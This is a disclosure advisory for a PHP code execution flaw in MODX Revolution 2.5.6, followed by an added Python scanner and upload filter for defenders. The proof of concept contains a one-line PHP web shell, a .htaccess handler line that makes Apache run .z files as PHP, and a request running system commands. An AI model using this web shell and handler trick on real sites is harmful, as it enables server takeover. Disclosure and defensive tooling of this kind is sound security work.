Date

Information

Name: MODX Revolution 2.5.6
Software: MODX CMS
Homepage: https://modx.com
Vulnerability: PHP code execution
Prerequisites: attacker needs to be an authenticated user with media manager permission
Severity: high
CVE: NA

Description

A user with media manager permissions can edit and upload files. This functionality can be used to execute PHP code on the server.

Proof of Concept

The attacker uses the media browser to edit and upload files. The application prevents the attacker from uploading PHP files directly, but it still allows him or her to edit or upload a .htaccess file. This can be used to instruct the web server to execute files with other extensions as PHP, leading to code execution on the server and site compromise.

The following scenario demonstrates the issue on an Apache web server.

Media Browser: http://victim.site/manager/?a=media/browser

The attacker edits or uploads a .htaccess file with the following content on the server:

AddHandler application/x-httpd-php .z

This instructs Apache to execute .z files as PHP (this works on a mod_php setup where the directory's AllowOverride includes FileInfo; AddType or SetHandler can be used to the same effect). Next, the attacker uploads a shell.z with the following content and executes it:

<?php $r=$_REQUEST;if(isset($r['x'])) $r['x']($r['c']);

The attacker can now execute PHP on the server by requesting the uploaded file directly (the view-source: prefix only keeps the browser from rendering the response): view-source:http://victim.site/shell.z?x=system&c=ls%20-lah. The response contains the output of ls -lah:

total 80K
drwxrwx--- 1 www-data www-data 4.0K Apr  2 23:56 .
drwxrwx--- 1 www-data www-data  12K Mar 31 17:54 ..
-rwxrwx--- 1 www-data www-data 3.4K Apr  4 23:57 .htaccess
drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 assets
-rwxrwx--- 1 www-data www-data  285 Mar 31 16:52 config.core.php
drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:00 connectors
drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 core
-rwxrwx--- 1 www-data www-data 1.9K Mar 28 08:42 index.php
drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:01 manager
-rwxrwx--- 1 www-data www-data   55 Apr  4 22:39 shell.z
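The following Python script is an added example for this advisory; it is not MODX code and not part of the original report. It shows the two checks a defender would want after reading the scenario above: a scanner that walks a web root for .htaccess files that route other extensions to the PHP handler (or override PHP ini settings via php_value, which mod_php also honours from .htaccess) and lists the files such a directive would execute, and an upload-name filter that rejects .htaccess, other dotfiles and reserved configuration names before the extension allowlist is consulted, checking every extension in the name because Apache's AddHandler matches any of them (shell.z.jpg would still run as PHP). The sample tree, the allowlist and all function names are constructed assumptions.

```python
"""Scan a web root for .htaccess-based PHP handler abuse; filter upload names.

Added example for this advisory, not MODX code. The sample tree, the
extension allowlist and all names below are constructed assumptions.
"""
import os
from typing import Dict, List, Tuple

# Directives that can make Apache run arbitrary files through PHP.
HANDLER_DIRECTIVES = {"addhandler", "sethandler", "addtype", "forcetype", "action"}
# Directives that change PHP's own configuration from .htaccess (mod_php only),
# e.g. "php_value auto_prepend_file /uploads/evil.jpg".
INI_DIRECTIVES = {"php_value", "php_flag", "php_admin_value", "php_admin_flag"}
# Names that reconfigure the server or PHP and must never be user-controlled.
RESERVED_NAMES = {".htaccess", ".htpasswd", ".user.ini", "php.ini", "web.config"}


def _norm_ext(ext: str) -> str:
    """Apache accepts extensions with or without the leading dot."""
    ext = ext.lower()
    return ext if ext.startswith(".") else "." + ext


def find_php_directives(htaccess_text: str) -> List[Tuple[str, List[str]]]:
    """Return (directive, extensions) for every line that routes files to PHP or
    overrides PHP ini settings. An empty extension list means the directive
    applies to every file in the directory (SetHandler, ForceType, php_*)."""
    findings: List[Tuple[str, List[str]]] = []
    for raw in htaccess_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        directive, *args = line.split()
        key = directive.lower()
        if key in HANDLER_DIRECTIVES:
            if args and "php" in args[0].lower():  # handler or MIME type names PHP
                exts = [_norm_ext(a) for a in args[1:]] if key in ("addhandler", "addtype") else []
                findings.append((directive, exts))
        elif key in INI_DIRECTIVES:
            findings.append((directive, []))
    return findings


def _file_exts(name: str) -> List[str]:
    """All extensions of a name; AddHandler matches any of them."""
    return ["." + p for p in name.lower().split(".")[1:] if p]


def scan_tree(files: Dict[str, str]) -> Dict[str, Dict[str, list]]:
    """files maps a relative path (forward slashes) to text content; only the
    content of .htaccess entries is read. Per risky .htaccess, return the
    directives found and the files in its subtree they would execute."""
    report: Dict[str, Dict[str, list]] = {}
    for path, content in files.items():
        if os.path.basename(path) != ".htaccess":
            continue
        findings = find_php_directives(content)
        if not findings:
            continue
        prefix = os.path.dirname(path)
        prefix = prefix + "/" if prefix else ""
        mapped = {e for _, exts in findings for e in exts}
        catch_all = any(not exts for _, exts in findings)
        affected = [
            other for other in files
            if other != path and other.startswith(prefix)
            and os.path.basename(other) != ".htaccess"
            and (catch_all or any(e in mapped for e in _file_exts(os.path.basename(other))))
        ]
        report[path] = {"directives": findings, "affected": sorted(affected)}
    return report


def scan_webroot(root: str) -> Dict[str, Dict[str, list]]:
    """Build the path->content map from a real directory and scan it."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name == ".htaccess":
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[rel] = fh.read()
            else:
                files[rel] = ""  # only the name matters for non-.htaccess files
    return scan_tree(files)


def is_upload_allowed(filename: str,
                      allowed_exts=("jpg", "jpeg", "png", "gif", "pdf")) -> Tuple[bool, str]:
    """Allowlist filter for user-supplied upload names: reject dotfiles and
    reserved names before the extension check, and check every extension."""
    if not filename or "/" in filename or "\\" in filename or filename in (".", ".."):
        return False, "empty name or path component"
    lower = filename.lower()
    if lower in RESERVED_NAMES:
        return False, "reserved server/PHP configuration file name"
    if lower.startswith("."):
        return False, "dotfiles are not accepted"
    exts = lower.split(".")[1:]
    if not exts or any(not e for e in exts):
        return False, "missing or empty extension"
    bad = [e for e in exts if e not in allowed_exts]
    if bad:
        return False, "extension .%s not in allowlist" % bad[0]
    return True, "ok"


# Constructed sample mirroring the advisory's listing: an attacker-planted
# handler line in the root .htaccess and the uploaded shell.z beside it.
SAMPLE_TREE = {
    ".htaccess": "RewriteEngine On\n# planted by the attacker:\nAddHandler application/x-httpd-php .z\n",
    "index.php": "",
    "config.core.php": "",
    "shell.z": "<?php $r=$_REQUEST;if(isset($r['x'])) $r['x']($r['c']);",
    "assets/logo.png": "",
    "assets/.htaccess": "Options -Indexes\n",
}

if __name__ == "__main__":
    for htaccess, info in scan_tree(SAMPLE_TREE).items():
        print(f"{htaccess}: {info['directives']} -> would execute {info['affected']}")
    for name in ("photo.jpg", ".htaccess", "shell.z", "shell.php.jpg"):
        print(name, is_upload_allowed(name))
```

Run scan_webroot("/var/www/html") (path assumed) against a live site to find planted handler lines; on the sample tree it reports the root .htaccess mapping .z to PHP and shell.z as the file it would execute. Independently of the CMS fix, serving the upload directory with AllowOverride None makes Apache ignore any .htaccess placed there, and disabling PHP for that tree in the virtual host removes the execution path even if a handler line gets in.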

Impact

Taking control over the site's administrator or media manager account leads to full compromise, since it allows executing PHP. Any WCI (a.k.a. XSS) vulnerability present in the MODX core or in any third-party plugin can potentially be used to take over the administrator's or media manager's session. This means that a single WCI vulnerability could be escalated to PHP code execution and compromise of the site.

Conclusion

An attacker with access to an account that has media manager permissions can execute PHP code on the server.

The following release has been published to mitigate the issue: https://modx.com/blog/modx-revolution-2.5.7

Timeline

  • 01.04.2017 | me > developer     | vulnerability discovered
  • 03.04.2017 | me > developer     | sent the report to the developers
  • 13.04.2017 | developer > me     | acknowledged the finding
  • 21.04.2017 | developer > public | new version released
  • 01.05.2017 | me > public        | full disclosure